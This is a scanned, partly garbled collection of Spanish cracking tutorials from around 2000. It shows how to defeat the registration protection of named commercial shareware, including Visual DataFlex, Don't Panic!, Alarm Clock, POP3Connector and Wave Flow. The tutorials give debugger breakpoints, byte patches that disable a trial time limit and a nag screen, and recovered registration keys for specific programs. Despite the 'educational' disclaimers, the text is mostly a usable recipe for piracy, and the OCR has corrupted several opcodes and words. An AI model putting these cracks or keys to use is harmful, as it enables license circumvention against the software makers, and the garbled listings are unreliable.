visual dataflex 6.x, webapp studio 1.x runtime 
webapp server 1.x runtime 
visual dataflex 6.x 


es decir todos los existentes menos para visual dataflex 7.x y que independientemente de la cantidad de números 
ingresados luego del guión estaría tomando solamente 7 u 8 a partir de la derecha aunque esto último no lo puedo 
asegurar con precisión. además es posible registrar distintos usuarios y productos dentro del mismo archivo 
termlist.cfg aunque solamente el último ingresado será el activo (a menos que lo modifiquemos mediante el botón set 
default name) los valores mostrados en 68h y 6a (y sus simétricos) muestran la cantidad de licencias registradas y cual 
de ellas es la activa. el valor mostrado en 34h y simétrico representa un valor calculado a partir del número serial 
(222222) y el nombre de registro y en la cual podría estar involucrada la llamda a user32.chartooema aunque de 
momento tampoco lo puedo precisar. 


00000000h: 53 75 6a 65 74 6f 20 54 61 63 69 74 6£ 00 00 00 ; sujeto tacito 
00000010h: 6f 72 61 74 69 6f 6e 00 00 00 00 00 00 00 00 00 

00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000030h: 00 00 la 00 Oe 64 03 00 10 18 00 12 00 00 00 00 

00000040h: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000050h: 00 00 00 00 00 00 00 00 2x ex cx 0x 00 00 00 00 

00000060h: 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 


han sido reemplazados algunos valores por x 


[DJregister Your Data Access Worldwide Product b - (0) xj 


Enter Registration Details 


You must registerthe product before you can use it. Enter your 
registration details exactly as printed 


Serial Number: [222222 
Registration Name: [Sujeto Tacito 
Registration Code: [xcxex2%-1 2001810 


TExisting Registration: 
[Product | RegisteredName | Serial Num_| 
«2» Visual DataFlex 6.x Sujeto Tacito 222222 
SetDefaultWName Delete Registration 


Wersion: 2.0 
Copyright: 1999 Data 4ccess Corporation ose | 


no difundiré los códigos de registro obtenidos ya que no es propósito de este manual perjudicar a la empresa 


dataaccess en modo alguno, sino solamente analizar la implementación de su esquema de protección. 


dado mi reciente comienzo con la ingeniería inversa creo no tener los suficientes conocimientos del ensamblador para 
poder analizar en forma correcta la llamada a la función del calculo del serial (y no porque no lo haya intentado) en: 
:100012f8 eS 13ffffff call 10001210 


y que me permitiría hechar algo de luz respecto al código para la versión 7.x del producto e incluso poder crear un 
keygen. 


hasta el momento solamente he podido averiguar lo siguiente: 
1. la posición 3ch y 43ch, en termlist.cfg, debe ser 01 para generar un serial correcto para la versión 7.x 


esta es aparentemente la única diferencia que existiría respecto a la de la versión 6.x ya que las llamadas a las 
rutinas de generación son las mismas en ambos productos. no he podido determinar si este valor forma parte del 
código de registro. 


2. la sección de código en la que determina si el producto es el de evaluación o el adquirido al comprar el producto 
es: 
* referenced by a (u)nconditional or (c)onditional jump at address: 
|:10001d7e(c) 


:10001d8a 8b15d8940010 mov edx, dword ptr [100094d8] 

:10001d90 64a12c000000 mov eax, dword ptr fs:[0000002c] 

:10001d96 clel0a shl ecx, Oa ecx = 400h 

:10001d99 8b1490 mov edx, dword ptr [eax+4*edx] 

:10001d9c 56 push esi 

:10001d9d 8d340a lea esi, dword ptr [edx+ecx] 

:10001da0 8b9670000000 mov edx, dword ptr [esi+00000070] apunta al valor 438h en termlist 
:10001da6 8b8674000000 mov eax, dword ptr [esi+00000074] apunta a 43c y debe ser = 01 
:10001dac £7c200000002 test edx, 02000000 compara 

:10001db2 89542418 mov dword ptr [esp+18], edx almacena el valor de 438h 

:10001db6 89442410 mov dword ptr [esp+10], eax almacena el 01 de 43ch 

:10001dba 746a je 10001e26 debe saltar a 1e26 

* referenced by a (u)nconditional or (c)onditional jump at address: 

|:10001dba(c) 


:10001e26 f644241001 test [esp+10], 01 and 43ch , 01 

:10001e2b 746a je 10001e97 no salta 

:10001e2d £7c200008000 test edx, 00800000 and 43ch, 800000 
:10001e33 bd0b000000 mov ebp, 0000000b 

:10001e38 7405 je 10001e3f debe saltar 

:10001e3a bd0c000000 mov ebp, 0000000c chico malo 

* referenced by a (u)nconditional or (c)onditional jump at address: 
|:10001e38(c) 


:10001e3f 8b3cad38800010 mov edi, dword ptr [4*ebp+10008038] 


es decir ebp contiene el valor b que va a permitir luego del cálculo que edi apunte a la dirección 1000842c la 
que contiene el string "visual dataflex 7.x". 


si ebp = c el valor obtenido del cálculo será 1000840c que apunta a "visual dataflex 7.x evaluation" 
3. en esta última parte del código es donde se generan los nombres de los diferentes productos a través de 


sucesivas comparaciones con la segunda parte del código de registro ingresado o leido de termlist.cfg en el caso 
de existir. (llamadas a winsetup. getregistrationname) 


por lo expuesto, este manual se encuentra inconcluso hasta que alguien con mayor conocimiento o experiencia pueda 
terminarlo o en su defecto pueda brindarme la ayuda necesaria para poder concluirlo. 


sujeto tacito 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


introduccion 


esta maravilla de programa tiene una gran utilización. aquí el comentario que saqué de softonic: 


oculta cualquier aplicación y avisa al resto de la oficina. don't panic! es algo más que un simple limpiador 
del historial de tu navegador. te permite abrir y cerrar al instante cualquier ventana con una sola pulsación, clic o 
movimiento de ratón. permite borrar los ficheros de internet, incluyendo el historial de páginas web visitadas, el 
historial de ficheros descargados, cookies y caché. también permite borrar todos los rastros que deja windows, 
como los documentos vistos recientemente, el portapapeles, la papelera de reciclaje, etc... 

todas estas opciones se pueden automatizar. 

don't panic! te permite asignar teclas a todas sus funciones para poder usarlo sin que se detecte, y lanzar cualquier 
aplicación, documento o página web. 

también tiene un curioso modo para su uso en lan; es el "sistema de alerta global", que permite alertar o ser 
alertado por otros usuarios de don't panic! cuando se acerque algún jefe, avisando con un icono de alerta en la 
barra de tareas de windows. 

permite ocultar programas específicos, como icq, napster, etc.. mientras se mantienen el resto de programas 
funcionando con aparente normalidad. es compatible tanto con internet explorer como con netscape. 


les recomiendo este programa. cuando está corriendo, también se puede cambiar el icono que se mostrará en la 
barra de tareas!. 


E el factor principal E 


analizamos el ejecutable con el file inspector y vemos que las cosas van a ser más fáciles de lo que creíamos. programa no 
empaketado, no encryptado, hecho en visual c++ 5.0. vamos bien j 


si nos bajamos la versión de evaluación tenemos las siguientes limitaciones: 


pasados los 30 días el programa deja de funcionar 

no podemos usar la opción de network 

tenemos una nag al principio que nos dice cuantos días nos quedan 
la palabra demo por todos lados 


creo ya podemos iros deshaciendo de la última. solamente debemos abir nuestro editor hexadecimal favorito y buscar las 
palabras demo demo demo, recuerden que los caracteres minúsculas y mayúsculas son diferentes en el código ascii. cuando 
los encontremos los rellenamos con espacios y listo. esta no es ningún problema. 


ahora nos vamos a algo más complicadillo, empezaremos por crackear el límite de tiempo. cerramos todos los programas que 
tengamos en ejecución, [ctrl+d] y pondremos 2 típicos breakpoints. bpx getlocaltime y bpx getsystemtime. las dos apis 
se usan para extraer el tiempo del sistema. aquí el funcionamiento de getlocaltime: 


void( 
/Idirección de estructura de tiempo del sistema (apunta a una 


lpsystemtime lpsystemtime 
PSy psy estructura 


hi systemtime para recibir la fecha y el tiempo del ordenador) 


el funcionamiento de getsystemtime es prácticamente el mismo solo que el tiempo se expresa en tiempo universal coordinado 
(utc, siglas en inglés). 


recuerden, traten de cerrar casi todos los programas en ejecución ya que estas dos apis son muy utilizadas por los 
programas, si no lo hacen el sice saltará permanentemente. presionen [crtl+alt+supr] y cierren la mayor cantidad de cosas 
posibles. cuando pusimos los breakpoints, ejecutamos el don't panic y enseguida saltamos al sice. ahora a darle a f12 hasta 
llegar a dp!.text+xxxx (donde xxxx es un número hexadecimal de 4 cifras). cuando lleguemos a dp! le damos a f12 hasta 
llegar a la rutina "semi-padre" de todas. concretamente hasta aquí: 


:00410b9f 8leccco00000O sub esp, 000000cc 

:00410ba5 8d45f£0 lea eax, dword ptr [ebp-10] 

:00410ba8 50 push eax 

:00410ba9 ff15a4904100 call [kernel32!getlocaltime] : extrae la hora del sistema 

:00410baf 8d45e0 lea eax, dword ptr [ebp-20] 

:00410bb2 50 push eax 

:00410bb3 ff158c914100 Call [kernel32!getsystemtime] : extrae la fecha del sistema 

:00410bb9 668b45ea mov ax, word ptr [ebp-16] 

:00410bbd 663b05da284200 Ccmp ax, word ptr [004228da] 

:00410bc4 753b jnz 00410c01 

:00410bc6 668b45e8 mov aX, word ptr [ebp-18] 

:00410bca 663b05d8284200 cmp ax, word ptr [004228d8] ; se realizan una serie de 

:00410bd1 752e jnz 00410001 O O OS 
serviran 

:00410bd3 668b45e6 mov aX, word ptr [ebp-1la] ; para nada 

:00410bd7 663b05d6284200 cmp ax, word ptr [004228d6] 

:00410bde 7521 jnz 00410c01 

:00410be0 668b45e2 mov ax, word ptr [ebp-1le] 

:00410be4 663b05d2284200 Ccmp ax, word ptr [004228d2] 

:00410beb 7514 jnz 00410c01 


:00410bed 668b45e0 mov aX, word ptr [ebp-20] 

:00410bf1 663b05d0284200 Ccmp ax, word ptr [004228d0] 

:00410bf8 7507 jnz 00410c01 

:00410bfa alc8284200 mov eax, dword ptr [004228c8] 

:00410bff eb45 jmp 00410c46 

:00410c01 8d8534ffffff lea eax, dword ptr [ebp+ffffff34] 

:00410c07 50 push eax 

:00410c08 f£f1590914100 Call [kerne132!gettimezoneinformat ion] 3 [Taducs la fecha obtenida en 
:00410c0e 83f8ff cmp eax, ffffffff por getsystemtime a formato 
:00410c11 741b jz 00410c2e tiempo local 


por aquí la cosa empieza a ser sospechosa. lo que tendríamos que hacer ahora sería buscar un salto abajo pero como de 
saltos está lleno buscaremos una call xxxxxxx (donde xxxxxxx es una dirección de memoria y no una api). le vamos 
dando a £10 hasta encontrar una call interesante y aquí está!: 


:00410c5f 50 push eax 

:00410c60 Of£b745£0 A 5% MERA BOL. [ERES 

:00410Cc64 50 push eax 

:00410C65 eSe1310000 call 00413e4b > llamada a la rutina que determina sí 
estamos 

:00410c6a 8b4d08 mOv ecx, dword ptr [ebp+08] ; dentro de los 30 días de evaluación 

:00410c6d 83c41c add esp, 0000001c 

:00410c70 8509 test ecx, ecx ; compara si el flag devuelto es O 

:00410c72 7402 jz 00410c76 ; s1ies así, hemos expirado 

:00410c74 8901 mov dword ptr [ecx], eax 

:00410Cc76 c9 leave 

:00410c77 c3 ret ; retorno, devuelve 


sería lógico pensar que deberíamos cambiar el jz por jnz pero si ejecutamos el don't panic no arranca. en estos casos 
debemos nopear la call. para calcular el offset de la call necesitamos o el w32dasm, o el krackpe de numit_or o el 
propio file inspector de viper. 

en este caso utilizaremos el file inspector, vamos a herramientas/rva to offset e introducimos la dirección de memoria 
de la call añadiendo la base. en mi caso da offset 10c65. 


abrimos nuestro editor hexadecimal, vamos a ese offset y cambiamos e8 el 31 00 00 por 90 90 90 90 90 o sino por 40 
48 40 48 40. probamos el programa y bien!!! dice que nos quedan 30 días. tan solo para cerciorarnos adelantamos la 
fecha del sistema 1 año y wow! siguen quedándonos 30 días de evaluación!. esto nos demuestra una cosa: 


límite de tiempo fuera!!! 


ya hicimos lo principal y ahora nos queda la nag. esta vez no utilizaremos los típicos breakpoints para las nags como 
createwindowexa o dialogboxparama, sino que utilizaremos los windows messages. generalmente con las nags son más 
efectivos qué los breakpoints típicos. ejecutamos el don't panic sin el límite de tiempo y cuando aparezca la nag no pulsen 
continue evaluation sino [ctrl+d] para entrar al sice. luego escriban hwnd para ver el handle de las ventanas que se están 
mostrando y luego presionen enter (traten de cerrar todas las otras ventanas para que solo se muestre la nag del don't 
panic). el dp.exe que era el ejecutable original lo he renombrado como crackeado.exe o sea que en qowner. ahora estudien 
los handles de las ventanas que se muestran pero que siempre vean los que en qowner digan crackeado (en mi caso, claro). 
se muestran 6 handles con crackeado en qowner. el que me pareció más interesante es este: 


windows handle hqueue SZ qowner class name windows procedure 


03c8(1) 


32 crackeado 


+32770 (dialog) 178£:000050b1 


me llamó la atención por que dice (dialog) en class name. ahora vamos a poner un break point para que cuando pulsemos el 
botón de "continuar" saltemos al sice. recuerden que el handle de la ventana y los demás datos cambian cada vez que 
ejecutas el programa. debemos poner un bmsg + handle + wm_destroy. esta vez no usaremos wm_enable o wm_command. 
en mi caso pondré bmsg 03c8 wm_destroy. si tienes alguna duda de los windows messages léete el tutorial de mi amigo 
kuato_thor sobre tutorial sobre passmark-burnintest 2.0, ahí explica algo sobre los windows messages. 


cuando hayas puesto el break point pulsa sobre continue evaluation y enseguida saltas al sice!. ahora a darle a f12 hasta 
llegar al código del crackeado.exe. concretamente hasta este punto: 


:0040ab95 05c0655200 add eax, 005265c0 

:0040ab9a 6200 push 00000000 

:0040ab9c a350234200 mov dword ptr [00422350], eax 

:0040abal e82adoffff call 00407bd0 ; genera la ventana 
:0040aba6 830404 add esp, 00000004 

:0040aba9 85c0 test eax, eax ; flag devuelto = 0 
:0040abab 7426 jz 0040abd3 ; muestra la ventana 
:0040abad 8b1544234200 mov edx, dword ptr [00422344] ,sies 1 

:0040abb3 a140234200 mov eax, dword ptr [00422340] ; no la muestra 
:0040abb8 6200 push 00000000 

:0040abba 68807d4000 push 00407d80 

:0040abbf 52 push edx 

p ; si el demo ha expirado dice lo de 
:0040abcO 68b4da4100 push 0041dab4 evaluation time expired! 
:0040abc5 50 push eax 

:0040abc6 ff15e0924100 call [user32!dialogboxparama] ; aquí nos paramos 
:0040abcc bd01000000 mov ebp, 00000001 

:0040abd1 eb29 jmp 0040abfc 

:0040abd3 ala0114200 mov eax, dword ptr [00421120] 

:0040abd8 85c0 test eax, eax 

:0040abda 7520 jnz 0040abfc 

:0040abdc 8b0d44234200 mov ecx, dword ptr [00422344] 

:0040abe2 8b1540234200 mov edx, dword ptr [00422340] 

:0040abe8 6200 push 00000000 

:0040abea 68907c4000 push 00407c90 

:0040abef 51 push ecx 

:0040abf0 68a4da4100 push 0041daa4 ; texto y título de la ventana 
:0040abf5 52 push edx 


por si acaso borramos todos los break points que hayamos puesto y ponemos uno en el salto (bpx 40abab), pulsamos 


continuar y si!, salta. invertimos el flag con r fl z y no sale la nag. creo que lo que haremos está claro. deberemos cambiar el 
jz 0040abd3 a ¡nz 0040abd3. el offset lo calculamos de la misma manera que lo hicimos antes. abrimos el editor hexadecimal, 
cambiamos el 74 a 75 y wow!. 


fuera nag!!! 


finalizando 


ahora sólo nos quedaría habilitar la opción de network, pero ese trabajo se los dejo a ustedes como tarea. les comunico una 
cosa, que este crack que hicimos es el primero de todo el mundo, bueno, el segundo ya que yo lo hice antes. 


Saludos a: 
e mr.jade 


e Xasx 


karpoff 

e skuater 

e act mago 
e todo [k-for] 


txeli (sigue así!) 


quisiera agradecer sobre todo a profesor x ya que sin su apoyo no hubiera crackeado este programa ni escrito estas líneas. 
gracias profe!. saludos a todos ustedes que leen mis manuales. recuerden, no acepto pedidos de cracks!!!. 


nos vemos en el próximo tutorial amigos!, 


enjoy!!! 


dek_oin/k-for 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Alarm Clock v2.11 


Serial 
Conseguir un número de serie válido 
Es una alarma 


Newbie 


http://www .saltwell.demon.co.uk/software/ 
file insPEctor v3.0 y Softl ce v4.05 
Act Mago FECHA: 08/11/2000 


introduccion 


hola amigos, presento mi décimo tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 


otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro 


debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


al atake 


abrimos el programa y lo primero que vemos es esto: 


Alarm Clock (Unregistered) 


Alarm Clock Version 2.11 
Copyright € John Hudson. January 2000 
Uniegiateied Copy - For Evaluation On 
If you are still using this program after one 


month, please register it for the low fee 
shown in he accompanying Help File ES 


no quieren que se nos olvide que el programa es shareware : ) 


le damos click a OK y vamos a la barra de tareas o task bar; hacemos click con el botón derecho del mouse y veremos las 
opciones entre las que se encuentra register, le damos click y estaremos por fin en la caja de registro, la que nos pide los 
siguientes datos: 


registration number: 
name: 


como siempre hacemos llenamos la caja con nuestro nombre y cualquier serial number, luego damos click en OK y por 
supuesto que el programa no aceptará el número de registro y nos mostrará un mensaje como este... 


Alarm Clock - Register 


Type your registration number below: 


ñ 233321 


Your name Colina 2 characters) 
¡Act MagO 


a continuación... cerramos alarm clock. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrará si está encriptado y también en que leguaje está hecho. abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable ac2.exe , luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


2, -= file insPEctor v3.0 - By VIPER [ K-FOR ] - Released 23/10/00 =- 


Datos PE | Secciones | Importaciones/Exportaciones ¿£ | Herramientas ] Acerca de... | 


¡Reconocimiento de signaturas 
Compilador: Borland Delphi 3.0 
Signatura: 
Versión de la DLL: hi 0 Información... ED Asociar EXE “s 


Versión del enlazador: [2.25 Versión de la imagen: fo.o 
Versión del SO: fi 0 Versión del subsistema: [4.0 


ES Abrir archivo... 5] Analizar GÍ Salir 


[CSWINDOWStac2.exe [ 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido softice para conseguir un 
número de serie válido. 


a continuación... cerramos file inspector v3.0. 


usando softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos alarm clock y vamos directamente a la caja de registro en donde introducimos nuestro nombre y 
cualquier número de serie . todavía no damos click en OK ; lo que ahora debemos hacer es presionar control+d para que 
salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a OK y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 004571c0 8b45f8 mov eax,[ebp-08] 

luego F10 2 veces para llegar aquí: 

015f: 004571c8 8945fc mov [ebp-04],eax 

si aquí colocamos d eax la window data se queda en blanco, pero si colocamos ? eax veremos esto: 
0001233321 

luego le damos a f10 4 veces para llegar aquí... 

015f: 004571d8 3b45fc cmp eax, [ebp-04] 


esta comparación es demasiado sospechosa como para dejarla de lado, por lo tanto colocamos d eax y la window data 
muestra un desorden de letras, entonces colocamos ? eax y veremos esto... 


0000234333 

al parecer lo hemos conseguido, pero... cómo estar seguros ? 
si presionamos f10 1 vez llegaremos a este salto... 

015f: 004572db Of8506010000 jnz 004572e7 


si aquí colocamos r fl z y luego damos f5 registraremos el programa pero sólo hasta volver a iniciarlo. como ya sabemos la 
función de aquella comparación ahora estamos seguros de que el número que hemos obtenido es válido. 


entonces la caja de registro quedaría así: 

registration number: 234333 

name: act mago 

mientras escribía este tutorial me registre con otro nombre de usuario por lo tanto la caja quedaría así: 
registration number: 234333 

name: (cualquiera) 


le damos click a OK y la caja ha aceptado nuestro código de registro, vamos a about alarm clock... y veremos esto: 


About Alarm Clock 


Alarm Clock Version 2.11 
Copyright € John Hudson, January 2000 


Registered to ot MagO 


programa crackeado... 


nota: 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoO hotmail.com 


saludos 


e saludos a tnt!crack!team ( saludos a xasx, no parare : ) ) 


e saludos a dek_oin. 
e saludos y agradecimientos a vi per del grupo [k-for], por el genial file inspector. 


e saludos a toda la people de tutoriales2000. 
e saludos a profesor x. 


e saludos al Ida (monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, solerman, nasal, peter 
y a todos los demás) 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


Karpoff Spanish Tutor 


Pop3connector V4.10 


PROTECCION: Serial 
Objetivo: Conseguir un número de serie válido 
Descripcion: para chequear el correo electrónico 
Dificultad: Newbie 
DOWNLOAD : http: //members.xoom.conypop3con 
Herramientas: Softice 4.05, file insPEctor 3.0 
CRACKER: Act Mago FECHA: 08/11/2000 
INTRODUCCION 
Introducción 


hola amigos, presento mi décimo primer tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 


otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro 


debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


comentario del programa 


programa que sirve para chequear el correo electrónico. 


el programa es shareware, tiene libre uso de 15 días, por lo que si quieres seguir usándolo después de este período 


debes registrarte. 


contamos con softice... 


al atake 


abrimos el programa y todo se ve normal, no hay nags ni pantallas invitándonos a conseguir un código de registro. pero si 
vamos a help nos encontraremos con la opción registration, a la que le damos click y nos encontramos con la caja de 
registro la que en este caso nos entrega un product id, pero vamos al grano, en mi caso la caja se ve así: 


Registeration El 


Product ID. [?8DC54DE343E20E8 
User name X Cancel | 


User e-mail 
Product Key Get Key | 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a register y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


POP3Connector 4.10 Xx] 


Invalid product key! Reoistration aborted 


a continuación... cerramos pop3connector. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrará si está encriptado y también en que leguaje está hecho. abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable pop3_4.exe , luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


8, -< file insPEctor v3.0 - By ViPER [ K-FOR ] - Released 23/10/00 =- 


€. 


] Herramientas | Acerca de... | 


Datos PE | Secciones | Importaciones/Exportaciones ¿ 


Reconocimiento de signaturas 
Compilador; Borland Delphi 3.0 
Signatura; 
Versión de la DLL: fi 0 Información... ED Asociar EXE 's 


Versión del enlazador: [2.25 Versión de la imagen; fo.o 
Versión del 50; In 0 Versión del subsistema; [4.0 


ES Abrir archivo... ¿58 Analizar GH salir 
¡Esiárchivos de programaPOP3CormectoriStandardipop3_4.exe | 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido softice para conseguir un 
código de registro real. 


a continuación... cerramos file inspector v3.0. 


usando softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 

a continuación...abrimos pop3connector y vamos directamente a la caja de registro en donde introducimos nuestro nombre, 
nuestro e-mail y cualquier código de registro. todavía no damos click en register ; lo que ahora debemos hacer es 
presionar control+d para que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 004aaf9f 8d55f8 lea edx,[ebp-08] 
luego f10 7 veces para llegar aquí: 


015f: 004aafb7 8bc3 mov eax,ebx --------- > d edx = actmagoO'hotmail.com y si colocamos d ecx = 1233321 (número 
falso) 


después de ver esto nos damos cuenta que vamos por buen camino... : ) 
ahora presionamos f1O 3 veces y llegamos aquí: 

015f: 0O04aafc1 8b55f8 mov edx,[ebp-08] 

nos paramos aquí y colocamos d edx para ver esto... 


actmagoO hotmail.com 


y si colocamos d eax veremos esto... 

f2344cfa 

creo que ya lo tenemos, ahora debemos presionar f10 1 vez para llegar aquí... 

015f: 004aafc4 es278ff5ff call 0O403€ef0 ------- > presionamos f8 para entrar a inspeccionar esta parte del código. 
después de darle a f8 debemos estar aquí... 

015f: 00403ef0 53 push ebx 

si aquí colocamos d edx veremos esto: 

1233321 (mi número de registro falso) 

y si colocamos d eax veremos esto: 

f2344cfa 

de aquí en adelante nuestro código y número de registro falso estarán por todas partes. 

abajo hay una comparación a la que llegamos presionando f10 5 veces. 

015f: 00403ef7 39d0 cmp eax,edx -------- > d eax = f2344cfa y si colocamos d edx = 1233321 


aquí el programa compara el código verdadero con que hemos introducido. 


ya lo hemos hecho, ahora sólo debemos colocar los mismos datos que habíamos colocado entes de entrar al softice pero 
obviamente variando el código de registro. 


en mi caso la caja quedaría así... 
product id : 76dc54d6343e20e8 
user name: act mago 


user e-mail: actmagoO hotmail.com 


product key: f2344cfa 


le damos click a register y veremos esto: 


POP3Connector 4.10 Xx] 


Registration was successful You must reload the program for cahges take effect 


programa crackeado... 


nota: 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoO hotmail.com 


saludos 


e saludos a Inticrack!team ( saludos a xasx, no parare : ) ) 


e saludos a dek_oin. 
e saludos y agradecimientos aV| per del grupo [k-for] , por el genial file inspector. 
e saludos a toda la people de tutoriales2000. 


e saludos a profesor x. 


e saludos al Idea (monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, solerman, nasal, peter 
y a todos los demás) 


e Saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Wave Flow v 3.5 


Name / Serial 

Editor de audio y reproductor de CD 
Crea tus propios temas de escritorio 
Newbie 

www.waveflow.com 


file insPEctor v3.0 y Softice 4.05 
Act Mago FECHA: 


introduccion 


08/11/2000 


hola amigos, bienvenidos a mi octavo tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 


otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro 


debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


comentario del programa 


potente editor de audio con más de 60 funciones y reproductor de cd. necesitas un editor de audio?ahora 
con wave flow tendrás un potente y útil editor de audio con una gran variedad de funciones. soporta múltiples 
ventanas (mdi), tiene una interfaz agradable y visual, y dispone de funciones como eco, reverberación, filtro 
avanzado (con previsualización del espectro), cambio de velocidad, y multitud de filtros y funciones para la mejora 
del ruido (tophat, mediana, media, ...). soporta los formatos .wav, .snd y .au, que son los más utilizados en internet 
para el sonido (audio). 


comentario sacado desde softonic debido a que no he tenido tiempo para utilizar el programa. 


lo que nos interesa... el programa es shareware con un valor de us$ 25. 


por suerte contamos con softice. 


al atake 


abrimos el programa y lo primero que vemos es esto: 


(c) Xavier Cirac 


SHAREWARE version 


hey !!, ya nos dimos cuenta que estos tipos no quieren que se nos olvide que no estamos registrados; ahora le damos click a 
register y ahora para entrar a la caja de registro le damos click a enter password , ya en la caja insertamos nuestro 
nombre y número de serie falso, en mi caso: 


login: act mago 
password: 1233321 


como hacemos siempre insertamos cualquier número de serie y le damos click a register y como el programa no es estúpido 
por supuesto que no aceptará los datos y mostrará algo así... 


Wave Flow SHAREWARE LX] 


BAD BOY/GIAL! 


Please register Wave Flow the next time. 


bonito mensaje... 
a continuación. ..cerramos wave flow. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrara si está encriptado y también en que leguaje está hecho.abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable (waveflow.exe) luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


Í 9, -= file insPEctor v3.0 - By VIPER [ K-FOR ] - Released 23/10/00 =- 


con la información que tenemos creo que el camino más fácil será usar nuestro querido softice para conseguir un código de 
registro válido. 


a continuación... cerramos file inspector v3.0. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos wave flow y vamos directamente a la caja de registro en donde introducimos nuestro nombre y 
cualquier número de serie. todavía no damos click en register ; lo que ahora debemos hacer es presionar control+d para 
que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f. 00471480 8b45f8 mov eax,[ebp-08] 

luego F1O 1 vez para llegar aquí: 

015f: 00471483 50 push eax 


creo que llegó la hora de preguntar : ) , si en esta línea colocamos d eax veremos en la window data nuestro código falso, 
en mi caso: 


1233321 

a continuación presionamos f10 8 veces para llegar aquí... 

015f: 00471410 58 pop eax 

si aquí colocamos d edx veremos en la window data lo siguiente: 


285172 


al parecer ya lo tenemos, pero cómo podemos estar tán seguros ? 

si presionas f10 2 veces llegarás aquí... 

015f: 00471426 Of8551010000 jnz v 

este salto nos manda más abajo, pero... qué pasaría si invertimos el salto colocando r fl z y a continuación presionamos f5 ? 
entonces veremos esto... 


Wave Flow SHAREWARE El 


G00D BOY¿GIALI 
